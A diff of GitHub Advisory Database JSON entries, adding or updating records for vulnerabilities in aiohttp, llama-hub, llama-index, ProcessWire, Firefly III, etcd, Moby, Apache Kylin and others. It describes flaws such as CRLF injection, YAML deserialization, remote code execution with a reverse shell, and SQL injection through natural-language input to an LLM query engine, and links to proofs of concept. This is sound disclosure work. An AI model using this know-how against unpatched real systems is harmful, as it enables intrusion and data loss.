"https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-250.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TY5SI6NK5243DEEDQUFKQKW5GQNKQUMA/" diff --git a/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json b/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json index 2da2e4c817161..844378e55ce25 100644 --- a/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json +++ b/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-qvrw-v9rv-5rjx", - "modified": "2023-11-29T21:50:01Z", + "modified": "2024-01-29T14:10:07Z", "published": "2023-11-27T23:17:24Z", "aliases": [ "CVE-2023-49082" ], "summary": "aiohttp's ClientSession is vulnerable to CRLF injection via method", - "details": "### Summary\nImproper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method.\n\n### Details\nThe vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request.\n\nPrevious releases performed no validation on the provided value. If an attacker controls the HTTP method it will be used as is and can lead to HTTP request smuggling.\n\n### PoC\nA minimal example can be found here:\nhttps://gist.github.com/jnovikov/7f411ae9fe6a9a7804cf162a3bdbb44b\n\n### Impact\nIf the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling).\n\n### Workaround\nIf unable to upgrade and using user-provided values for the request method, perform manual validation of the user value (e.g. by restricting it to a few known values like GET, POST etc.).", + "details": "### Summary\nImproper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method.\n\n### Details\nThe vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request.\n\nPrevious releases performed no validation on the provided value. If an attacker controls the HTTP method it will be used as is and can lead to HTTP request smuggling.\n\n### PoC\nA minimal example can be found here:\nhttps://gist.github.com/jnovikov/7f411ae9fe6a9a7804cf162a3bdbb44b\n\n### Impact\nIf the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling).\n\n### Workaround\nIf unable to upgrade and using user-provided values for the request method, perform manual validation of the user value (e.g. by restricting it to a few known values like GET, POST etc.).\n\nPatch: https://github.com/aio-libs/aiohttp/pull/7806/files", "severity": [ { "type": "CVSS_V3", @@ -44,6 +44,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49082" }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/7806/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/e4ae01c2077d2cfa116aa82e4ff6866857f7c466" + }, { "type": "WEB", "url": "https://gist.github.com/jnovikov/7f411ae9fe6a9a7804cf162a3bdbb44b" @@ -52,6 +60,10 @@ "type": "PACKAGE", "url": "https://github.com/aio-libs/aiohttp" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-251.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TY5SI6NK5243DEEDQUFKQKW5GQNKQUMA/" diff --git a/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json b/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json index dd2db23b240fb..5fed91be321b3 100644 --- a/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json +++ b/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json @@ -63,7 +63,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" @@ -110,6 +110,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" @@ -314,6 +318,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CAYYW35MUTNO65RVAELICTNZZFMT2XS/" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/" @@ -358,6 +366,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KMZCVGUGJZZVDPCVDA7TEB22VUCNEXDD/" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/" diff --git a/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json b/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json index 9c4d38ffc7c96..60a6d56361ad7 100644 --- a/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json +++ b/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json @@ -53,6 +53,10 @@ "type": "PACKAGE", "url": "https://github.com/mlflow/mlflow" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2023-252.yaml" + }, { "type": "WEB", "url": "https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850" diff --git a/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json b/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json index ccebd602b5668..7385fdd9d72b6 100644 --- a/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json +++ b/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cgwq-6prq-8h9q", - "modified": "2023-12-06T03:14:51Z", + "modified": "2024-02-07T16:16:53Z", "published": "2023-12-05T22:46:25Z", "aliases": [ "CVE-2023-49282" @@ -63,6 +63,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49282" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/microsoft/microsoft-graph/CVE-2023-49282.yaml" + }, { "type": "WEB", "url": "https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1" diff --git a/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json b/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json index 5a2f780c0c3b2..7c3950ceb4b3a 100644 --- a/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json +++ b/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/SemanticMediaWiki/SemanticMediaWiki/commit/604968d44fcdfcbb7f1e00c5d662ca5d5a3a5613" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mediawiki/semantic-media-wiki/CVE-2022-48614.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/SemanticMediaWiki/SemanticMediaWiki" diff --git a/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json b/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json index 86bfe8bcaa780..7e76cca611d0e 100644 --- a/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json +++ b/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json @@ -28,11 +28,14 @@ "introduced": "5.8.22" }, { - "last_affected": "5.8.24" + "fixed": "5.8.25" } ] } - ] + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.24" + } } ], "references": [ diff --git a/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json b/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json index 09446135df9da..6130d75a8b81c 100644 --- a/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json +++ b/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mhhp-c3cm-2r86", - "modified": "2023-12-06T03:16:33Z", + "modified": "2024-02-07T16:17:14Z", "published": "2023-12-05T22:46:57Z", "aliases": [ "CVE-2023-49283" @@ -48,6 +48,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49283" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/microsoft/microsoft-graph-core/CVE-2023-49283.yaml" + }, { "type": "WEB", "url": "https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1" diff --git a/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json b/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json index e72c0c3ffb9fe..180f26f3dca64 100644 --- a/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json +++ b/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-297x-2qf3-jrj3", - "modified": "2024-01-22T21:23:34Z", + "modified": "2024-01-29T16:25:51Z", "published": "2024-01-21T18:30:34Z", "aliases": [ "CVE-2024-23730" @@ -9,7 +9,10 @@ "summary": "Unsafe yaml deserialization in llama-hub", "details": "The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -39,7 +42,11 @@ }, { "type": "WEB", - "url": "https://github.com/run-llama/llama-hub/pull/841/commits/9dc9c21a5c6d0226d1d2101c3121d4f085743d52" + "url": "https://github.com/run-llama/llama-hub/commit/c01416e737c7747a213a79881b8308c41d043515" + }, + { + "type": "PACKAGE", + "url": "https://github.com/run-llama/llama-hub" }, { "type": "WEB", @@ -54,7 +61,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-01-22T21:23:34Z", "nvd_published_at": "2024-01-21T17:15:44Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-29w6-c52g-m8jc/GHSA-29w6-c52g-m8jc.json b/advisories/github-reviewed/2024/01/GHSA-29w6-c52g-m8jc/GHSA-29w6-c52g-m8jc.json new file mode 100644 index 0000000000000..4776e870c8d40 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-29w6-c52g-m8jc/GHSA-29w6-c52g-m8jc.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29w6-c52g-m8jc", + "modified": "2024-01-31T18:05:46Z", + "published": "2024-01-31T18:05:46Z", + "aliases": [ + + ], + "summary": "C5 Firefly III CSV Injection.", + "details": "### Summary\nCSV injection is a vulnerability where untrusted user input in CSV files can lead to unauthorized access or data manipulation. \nIn my subsequent testing of the application.\n\n### Details\nI discovered that there is an option to \"Export Data\" from the web app to your personal computer, which exports a \"csv\" file that can be opened with Excel software that supports macros.\n\nP.S \nI discovered that the web application's is offering a demo-site that anyone may access to play with the web application. So, there's a chance that someone will export the data (CVS) from the demo site and execute it on their PC, giving the malicious actor a complete control over their machine. (if a user enters a malicious payload to the website).\n\n### PoC\nYou can check out my vulnerability report if you need more details/PoC with screenshots: (removed by JC5)\n\n### Impact\nAn attacker can exploit this by entering a specially crafted payload to one of the fields, and when a user export the csv file using the \"Export Data\" function, the attacker can potentiality can RCE.\n\n### Addendum by JC5, the developer of Firefly III\nThere is zero impact on normal users, even on vulnerable versions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "grumpydictator/firefly-iii" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.1.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/firefly-iii/firefly-iii/security/advisories/GHSA-29w6-c52g-m8jc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/firefly-iii/firefly-iii" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:05:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json b/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json index a31e1f28ca0d5..ee04efa524474 100644 --- a/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json +++ b/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2cvg-w29m-j8xc", - "modified": "2024-01-24T21:54:14Z", + "modified": "2024-01-30T21:33:59Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2023-24676" @@ -9,7 +9,10 @@ "summary": "Arbitrary Code Execution in Processwire", "details": "An issue found in Processwire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -37,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24676" }, + { + "type": "PACKAGE", + "url": "https://github.com/processwire/processwire" + }, { "type": "WEB", "url": "https://medium.com/%40cupc4k3/reverse-shell-via-remote-file-inlusion-in-proccesswire-cms-a8fa5ace3255" @@ -46,7 +53,7 @@ "cwe_ids": [ "CWE-94" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-01-24T21:54:14Z", "nvd_published_at": "2024-01-24T21:15:08Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json b/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json index eefed4d48952e..e52cfae32953a 100644 --- a/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json +++ b/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2jxw-4hm4-6w87", - "modified": "2024-01-23T20:10:02Z", + "modified": "2024-01-29T16:31:48Z", "published": "2024-01-22T03:30:26Z", "aliases": [ "CVE-2024-23751" @@ -9,7 +9,10 @@ "summary": "SQL injection in llama-index", "details": "LlamaIndex (aka llama_index) through 0.9.35 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via \"Drop the Students table\" within English language input.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -54,7 +57,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-01-23T20:10:02Z", "nvd_published_at": "2024-01-22T01:15:08Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-2wgc-48g2-cj5w/GHSA-2wgc-48g2-cj5w.json b/advisories/github-reviewed/2024/01/GHSA-2wgc-48g2-cj5w/GHSA-2wgc-48g2-cj5w.json new file mode 100644 index 0000000000000..4aa7a2b4e17c1 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-2wgc-48g2-cj5w/GHSA-2wgc-48g2-cj5w.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wgc-48g2-cj5w", + "modified": "2024-01-30T20:56:46Z", + "published": "2024-01-30T20:56:46Z", + "aliases": [ + "CVE-2024-21653" + ], + "summary": "vantage6 has insecure SSH configuration for node and server containers", + "details": "### Impact\nNodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive.\n\nWe will probably opt to completely remove the ssh option as it is only used for debugging. Later, we can add a debug mode where we can activate it if necessary.\n\n### Workarounds\nRemove the ssh part from the docker file and build your own docker image", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-2wgc-48g2-cj5w" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21653" + }, + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/commit/3fcc6e6a8bd1142fd7a558d8fdd2b246e55c8841" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:46Z", + "nvd_published_at": "2024-01-30T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-2xhq-gv6c-p224/GHSA-2xhq-gv6c-p224.json b/advisories/github-reviewed/2024/01/GHSA-2xhq-gv6c-p224/GHSA-2xhq-gv6c-p224.json new file mode 100644 index 0000000000000..1d314bef27e39 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-2xhq-gv6c-p224/GHSA-2xhq-gv6c-p224.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xhq-gv6c-p224", + "modified": "2024-01-31T00:21:52Z", + "published": "2024-01-31T00:21:52Z", + "aliases": [ + "CVE-2020-15114" + ], + "summary": "Etcd Gateway can include itself as an endpoint resulting in resource exhaustion", + "details": "### Vulnerability type\nDenial of Service\n\n### Detail\nThe etcd gateway is a simple TCP proxy to allow for basic service discovery and access. However, it is possible to include the gateway address as an endpoint. This results in a denial of service, since the endpoint can become stuck in a loop of requesting itself until there are no more available file descriptors to accept connections on the gateway.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-2xhq-gv6c-p224" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15114" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-772" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:21:52Z", + "nvd_published_at": "2020-08-06T23:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json b/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json index 161d348457f91..465b07e1971db 100644 --- a/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json +++ b/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json @@ -65,6 +65,10 @@ "type": "WEB", "url": "https://github.com/python-pillow/Pillow/releases" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00019.html" + }, { "type": "WEB", "url": "https://pillow.readthedocs.io/en/stable/releasenotes/10.2.0.html#security" diff --git a/advisories/github-reviewed/2024/01/GHSA-3fwx-pjgw-3558/GHSA-3fwx-pjgw-3558.json b/advisories/github-reviewed/2024/01/GHSA-3fwx-pjgw-3558/GHSA-3fwx-pjgw-3558.json new file mode 100644 index 0000000000000..dd06201b8d38c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-3fwx-pjgw-3558/GHSA-3fwx-pjgw-3558.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fwx-pjgw-3558", + "modified": "2024-01-31T23:28:58Z", + "published": "2024-01-31T23:28:58Z", + "aliases": [ + "CVE-2021-41091" + ], + "summary": "Moby (Docker Engine) Insufficiently restricted permissions on data directory", + "details": "## Impact\n\nA bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.\n\n## Patches\n\nThis bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed.\n\n## Workarounds\n\nLimit access to the host to trusted users. Limit access to host volumes to trusted containers.\n\n## Credits\n\nThe Moby project would like to thank Joan Bruguera for responsibly disclosing this issue in accordance with the [Moby security policy](https://github.com/moby/moby/blob/master/SECURITY.md).\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n* [Open an issue](https://github.com/moby/moby/issues/new)\n* Email us at security@docker.com if you think you’ve found a security bug", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "20.10.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-3fwx-pjgw-3558" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41091" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/f0ab919f518c47240ea0e72d0999576bb8008e64" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281", + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:28:58Z", + "nvd_published_at": "2021-10-04T21:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-3vvc-v8c2-43r7/GHSA-3vvc-v8c2-43r7.json b/advisories/github-reviewed/2024/01/GHSA-3vvc-v8c2-43r7/GHSA-3vvc-v8c2-43r7.json new file mode 100644 index 0000000000000..484a38020a4e5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-3vvc-v8c2-43r7/GHSA-3vvc-v8c2-43r7.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vvc-v8c2-43r7", + "modified": "2024-02-02T15:59:47Z", + "published": "2024-01-29T15:30:25Z", + "aliases": [ + "CVE-2023-29055" + ], + "summary": "Apache Kylin has Insufficiently Protected Credentials", + "details": "In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials.\n\nTo avoid this threat, users are recommended to \n\n * Always turn on HTTPS so that network payload is encrypted.\n\n * Avoid putting credentials in kylin.properties, or at least not in plain text.\n * Use network firewalls to protect the serverside such that it is not accessible to external attackers.\n\n * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.kylin:kylin-core-common" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "4.0.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29055" + }, + { + "type": "WEB", + "url": "https://github.com/apache/kylin/commit/b60d5ae694dffc2281bfe0ef464eada0b3a9b774" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/kylin" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/o1bvyv9wnfkx7dxpfjlor20nykgsoh6r" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/29/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:29:38Z", + "nvd_published_at": "2024-01-29T13:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json b/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json index 0858911efe95f..befc3f6440e1e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json +++ b/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json @@ -106,6 +106,10 @@ { "type": "PACKAGE", "url": "https://github.com/jupyterlab/jupyterlab" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-45gq-q4xh-cp53/GHSA-45gq-q4xh-cp53.json b/advisories/github-reviewed/2024/01/GHSA-45gq-q4xh-cp53/GHSA-45gq-q4xh-cp53.json new file mode 100644 index 